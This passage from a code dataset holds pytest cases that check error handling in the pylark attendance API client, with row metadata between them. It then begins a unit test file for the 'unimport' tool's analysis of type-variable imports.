assert "msg=failed" in f"{e}"
def test_mock_get_token_batch_create_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_task_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_update_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_allowed_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_init_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert "msg=failed" in f"{e}"
# mock mock self func
class TestAttendanceSampleMockSelfFuncFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleMockSelfFuncFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.attendance
def test_mock_self_func_download_attendance_file(self):
origin_func = self.module_cli.download_attendance_file
self.module_cli.download_attendance_file = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(pylark.DownloadAttendanceFileReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.download_attendance_file = origin_func
def test_mock_self_func_upload_attendance_file(self):
origin_func = self.module_cli.upload_attendance_file
self.module_cli.upload_attendance_file = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.upload_attendance_file = origin_func
def test_mock_self_func_query_attendance_user_settings(self):
origin_func = self.module_cli.query_attendance_user_settings
self.module_cli.query_attendance_user_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.query_attendance_user_settings = origin_func
def test_mock_self_func_update_attendance_user_settings(self):
origin_func = self.module_cli.update_attendance_user_settings
self.module_cli.update_attendance_user_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_attendance_user_settings = origin_func
def test_mock_self_func_create_update_attendance_group(self):
origin_func = self.module_cli.create_update_attendance_group
self.module_cli.create_update_attendance_group = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_update_attendance_group = origin_func
def test_mock_self_func_delete_attendance_group(self):
origin_func = self.module_cli.delete_attendance_group
self.module_cli.delete_attendance_group = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(pylark.DeleteAttendanceGroupReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.delete_attendance_group = origin_func
def test_mock_self_func_get_attendance_group(self):
origin_func = self.module_cli.get_attendance_group
self.module_cli.get_attendance_group = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(pylark.GetAttendanceGroupReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_group = origin_func
def test_mock_self_func_create_attendance_shift(self):
origin_func = self.module_cli.create_attendance_shift
self.module_cli.create_attendance_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_attendance_shift = origin_func
def test_mock_self_func_delete_attendance_shift(self):
origin_func = self.module_cli.delete_attendance_shift
self.module_cli.delete_attendance_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(pylark.DeleteAttendanceShiftReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.delete_attendance_shift = origin_func
def test_mock_self_func_get_attendance_shift_by_id(self):
origin_func = self.module_cli.get_attendance_shift_by_id
self.module_cli.get_attendance_shift_by_id = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_shift_by_id = origin_func
def test_mock_self_func_get_attendance_shift_by_name(self):
origin_func = self.module_cli.get_attendance_shift_by_name
self.module_cli.get_attendance_shift_by_name = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_shift_by_name = origin_func
def test_mock_self_func_get_attendance_statistics_data(self):
origin_func = self.module_cli.get_attendance_statistics_data
self.module_cli.get_attendance_statistics_data = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_statistics_data = origin_func
def test_mock_self_func_get_attendance_statistics_header(self):
origin_func = self.module_cli.get_attendance_statistics_header
self.module_cli.get_attendance_statistics_header = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_statistics_header = origin_func
def test_mock_self_func_update_attendance_user_statistics_settings(self):
origin_func = self.module_cli.update_attendance_user_statistics_settings
self.module_cli.update_attendance_user_statistics_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_attendance_user_statistics_settings = origin_func
def test_mock_self_func_get_attendance_user_statistics_settings(self):
origin_func = self.module_cli.get_attendance_user_statistics_settings
self.module_cli.get_attendance_user_statistics_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_statistics_settings = origin_func
def test_mock_self_func_get_attendance_user_daily_shift(self):
origin_func = self.module_cli.get_attendance_user_daily_shift
self.module_cli.get_attendance_user_daily_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_daily_shift = origin_func
def test_mock_self_func_get_attendance_user_task(self):
origin_func = self.module_cli.get_attendance_user_task
self.module_cli.get_attendance_user_task = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_task = origin_func
def test_mock_self_func_get_attendance_user_flow(self):
origin_func = self.module_cli.get_attendance_user_flow
self.module_cli.get_attendance_user_flow = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(pylark.GetAttendanceUserFlowReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_flow = origin_func
def test_mock_self_func_batch_get_attendance_user_flow(self):
origin_func = self.module_cli.batch_get_attendance_user_flow
self.module_cli.batch_get_attendance_user_flow = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.batch_get_attendance_user_flow = origin_func
def test_mock_self_func_batch_create_attendance_user_flow(self):
origin_func = self.module_cli.batch_create_attendance_user_flow
self.module_cli.batch_create_attendance_user_flow = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.batch_create_attendance_user_flow = origin_func
def test_mock_self_func_get_attendance_user_task_remedy(self):
origin_func = self.module_cli.get_attendance_user_task_remedy
self.module_cli.get_attendance_user_task_remedy = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_task_remedy = origin_func
def test_mock_self_func_create_update_attendance_user_daily_shift(self):
origin_func = self.module_cli.create_update_attendance_user_daily_shift
self.module_cli.create_update_attendance_user_daily_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_update_attendance_user_daily_shift = origin_func
def test_mock_self_func_get_attendance_user_approval(self):
origin_func = self.module_cli.get_attendance_user_approval
self.module_cli.get_attendance_user_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_approval = origin_func
def test_mock_self_func_create_attendance_user_approval(self):
origin_func = self.module_cli.create_attendance_user_approval
self.module_cli.create_attendance_user_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_attendance_user_approval = origin_func
def test_mock_self_func_get_attendance_user_allowed_remedy(self):
origin_func = self.module_cli.get_attendance_user_allowed_remedy
self.module_cli.get_attendance_user_allowed_remedy = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_allowed_remedy = origin_func
def test_mock_self_func_init_attendance_remedy_approval(self):
origin_func = self.module_cli.init_attendance_remedy_approval
self.module_cli.init_attendance_remedy_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.init_attendance_remedy_approval = origin_func
def test_mock_self_func_update_attendance_remedy_approval(self):
origin_func = self.module_cli.update_attendance_remedy_approval
self.module_cli.update_attendance_remedy_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_attendance_remedy_approval = origin_func
# mock raw request
class TestAttendanceSampleMockRawRequestFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleMockRawRequestFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.attendance
self.cli.raw_request = mock_raw_request
def test_mock_raw_request_download_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(
pylark.DownloadAttendanceFileReq(
file_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_upload_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_query_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_update_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_delete_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(
pylark.DeleteAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(
pylark.GetAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_delete_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(
pylark.DeleteAttendanceShiftReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_shift_by_id(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_shift_by_name(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_statistics_data(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_statistics_header(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq(
user_stats_view_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_task(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(
pylark.GetAttendanceUserFlowReq(
user_flow_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_batch_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_batch_create_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_task_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_update_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_allowed_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_init_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
# real request
class TestAttendanceSampleRealRequestFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleRealRequestFailed, self).__init__(*args, **kwargs)
self.cli = app_no_permission.ins()
self.module_cli = self.cli.attendance
def test_real_request_download_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(
pylark.DownloadAttendanceFileReq(
file_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_upload_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_query_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_update_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_delete_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(
pylark.DeleteAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(
pylark.GetAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_delete_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(
pylark.DeleteAttendanceShiftReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_shift_by_id(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_shift_by_name(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_statistics_data(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_statistics_header(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq(
user_stats_view_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_task(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(
pylark.GetAttendanceUserFlowReq(
user_flow_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_batch_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_batch_create_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_task_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_update_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_allowed_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_init_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
| 38.595413
| 88
| 0.687775
| 5,000
| 42,069
| 5.4484
| 0.0238
| 0.070846
| 0.0921
| 0.069378
| 0.97592
| 0.973754
| 0.965164
| 0.949747
| 0.916196
| 0.879524
| 0
| 0.001755
| 0.241437
| 42,069
| 1,089
| 89
| 38.630854
| 0.851905
| 0.002591
| 0
| 0.623188
| 1
| 0
| 0.036326
| 0.01535
| 0
| 0
| 0
| 0
| 0.228261
| 1
| 0.137681
| false
| 0
| 0.006039
| 0
| 0.148551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cfe62f89b359bd46da7d82fbdcfc5a36394be43
| 8,562
|
py
|
Python
|
tests/analyzer/test_type_variable.py
|
CAM-Gerlach/unimport
|
acaebf547274a95a33816e47ec22bb73d8456b17
|
[
"MIT"
] | 147
|
2019-09-19T15:43:06.000Z
|
2022-03-25T16:42:08.000Z
|
tests/analyzer/test_type_variable.py
|
CAM-Gerlach/unimport
|
acaebf547274a95a33816e47ec22bb73d8456b17
|
[
"MIT"
] | 154
|
2019-10-31T19:50:18.000Z
|
2022-03-29T12:43:00.000Z
|
tests/analyzer/test_type_variable.py
|
CAM-Gerlach/unimport
|
acaebf547274a95a33816e47ec22bb73d8456b17
|
[
"MIT"
] | 28
|
2019-10-31T18:11:13.000Z
|
2021-09-06T08:24:14.000Z
|
from tests.analyzer.utils import AnalyzerTestCase
from unimport.statement import Import, ImportFrom, Name
class TypeVariableTestCase(AnalyzerTestCase):
def test_union_import(self):
self.assertUnimportEqual(
source="""\
import typing
if typing.TYPE_CHECKING:
from PyQt5.QtWebEngineWidgets import QWebEngineHistory
from PyQt5.QtWebKit import QWebHistory
HistoryType = typing.Union['QWebEngineHistory', 'QWebHistory']
""",
expected_names=[
Name(lineno=2, name="typing.TYPE_CHECKING"),
Name(lineno=6, name="HistoryType"),
Name(lineno=6, name="QWebEngineHistory"),
Name(lineno=6, name="QWebHistory"),
Name(lineno=6, name="typing.Union"),
],
expected_imports=[
Import(
lineno=1,
column=1,
name="typing",
package="typing",
),
ImportFrom(
lineno=3,
column=1,
name="QWebEngineHistory",
package="PyQt5.QtWebEngineWidgets",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_union_from(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from PyQt5.QtWebEngineWidgets import QWebEngineHistory
from PyQt5.QtWebKit import QWebHistory
HistoryType = Union['QWebEngineHistory', 'QWebHistory']
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=6, name="HistoryType"),
Name(lineno=6, name="QWebEngineHistory"),
Name(lineno=6, name="QWebHistory"),
Name(lineno=6, name="Union"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
